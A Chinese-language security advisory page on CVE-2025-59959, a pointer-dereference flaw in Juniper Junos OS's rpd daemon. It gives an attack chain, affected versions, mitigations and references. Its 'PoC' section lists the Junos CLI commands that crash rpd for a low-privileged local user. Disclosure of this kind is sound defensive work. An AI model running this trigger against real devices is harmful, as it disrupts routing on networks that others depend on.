CVE-2025-59959 CVSS 5.5 中危

CVE-2025-59959: Juniper Junos OS rpd守护进程指针解引用拒绝服务漏洞

披露日期: 2026-01-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-59959

漏洞类型

指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS, Juniper Networks Junos OS Evolved

漏洞概述

CVE-2025-59959是Juniper Networks Junos OS和Junos OS Evolved中路由协议守护进程(rpd)存在的一个不受信任的指针解引用(Untrusted Pointer Dereference)漏洞。该漏洞允许本地已认证的低权限攻击者通过执行特定命令触发rpd进程崩溃并重启，从而造成拒绝服务(DoS)攻击。攻击者只需在设备上拥有低权限账户即可利用此漏洞，无需特殊权限或用户交互。由于rpd是路由系统的核心组件，其崩溃会导致路由功能中断，影响网络通信的可用性。

技术细节

该漏洞源于rpd守护进程在处理特定路由属性时的不当指针操作。当攻击者执行命令'show route < ( receive-protocol | advertising-protocol ) bgp > detail'时，如果输出中包含具有特定属性的路由，rpd进程将尝试解引用一个不受信任的指针，导致内存访问违规并引发崩溃。需要注意的是，'show route ... extensive'命令不受此漏洞影响。攻击者需要预先配置BGP协议并建立相关路由关系，然后通过触发特定的路由显示命令来触发漏洞利用。整个攻击过程在本地执行，攻击复杂度较低。

攻击链分析

STEP 1

步骤1: 访问Juniper设备

攻击者获取Junos OS或Junos OS Evolved设备的低权限账户访问权限

STEP 2

步骤2: 配置BGP环境

确保设备上配置了BGP协议并存在相关路由条目

STEP 3

步骤3: 执行触发命令

执行'show route receive-protocol bgp detail'或'show route advertising-protocol bgp detail'命令

STEP 4

步骤4: 触发漏洞

当输出中存在特定属性的路由时，rpd进程解引用无效指针导致崩溃

STEP 5

步骤5: 造成拒绝服务

rpd进程崩溃并自动重启，期间路由功能中断，攻击者持续触发可导致持续DoS

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-59959 PoC - Juniper Junos OS rpd DoS
# Prerequisites: Local access with low privileges to Junos OS device

# Connect to Junos device via SSH or console
# Execute the following commands as low-privilege user:

# Trigger the vulnerability
show route receive-protocol bgp detail
show route advertising-protocol bgp detail

# The above commands will cause rpd crash and restart
# No root privileges required - works with authenticated low-privilege user

# Verify rpd restart in system logs:
# show log messages | match rpd
# show system core-dumps

影响范围

Junos OS < 22.4R3-S8

Junos OS 23.2 < 23.2R2-S5

Junos OS 23.4 < 23.4R2-S5

Junos OS 24.2 < 24.2R2-S2

Junos OS 24.4 < 24.4R2

Junos OS Evolved < 22.4R3-S8-EVO

Junos OS Evolved 23.2 < 23.2R2-S5-EVO

Junos OS Evolved 23.4 < 23.4R2-S6-EVO

Junos OS Evolved 24.2 < 24.2R2-S2-EVO

Junos OS Evolved 24.4 < 24.4R2-EVO

防御指南

临时缓解措施

如果无法立即升级，可通过限制用户权限、监控rpd进程状态、配置自动告警等方式缓解风险。建议使用命令'show route ... extensive'替代受影响命令作为临时规避方案，但根本解决仍需升级到修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59959
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59959
3 Details https://www.cvedetails.com/cve/CVE-2025-59959/
4 VulDB https://vuldb.com/cve/CVE-2025-59959
5 Link https://kb.juniper.net/JSA103148
6 Link https://supportportal.juniper.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表